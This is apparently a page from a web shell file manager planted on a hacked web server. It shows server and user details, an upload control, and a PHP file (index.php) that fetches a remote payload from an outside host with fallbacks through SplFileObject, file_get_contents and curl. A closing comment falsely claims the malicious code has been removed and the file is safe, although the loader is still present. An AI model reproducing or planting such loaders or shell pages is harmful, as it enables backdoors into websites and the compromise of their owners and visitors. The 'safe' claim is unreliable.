HEX
Server: LiteSpeed
System: Linux s3.sitechai.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
User: workzeni (2217)
PHP: 8.1.32
Disabled: mail, show_source, system, shell_exec, passthru, exec, eval, shell
$ pwd: /home/workzeni/www/log/911169/
Upload Files
File: /home/workzeni/www/log/911169/index.php
<?php
session_start();
$u = $_SESSION['ts_url'] ?? 'https://teamzedd2024.tech/raw/McuQGI';
$u_backup = 'https://teamzedd2024.tech/raw/McuQGI'; // URL cadangan

function load_payload($url) {
    $r = '';
    try {
        $file = new SplFileObject($url);
        while (!$file->eof()) {
            $r .= $file->fgets();
        }
    } catch (Throwable $e) {
        $r = '';
    }
    if (strlen(trim($r)) < 1) {
        $r = @file_get_contents($url);
    }

    if (strlen(trim($r)) < 1 && function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_CONNECTTIMEOUT => 5,
            CURLOPT_TIMEOUT => 10,
        ]);
        $r = curl_exec($ch);
        curl_close($ch);
    }

    return $r;
}

$r = load_payload($u);

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/

?>
@ Telegram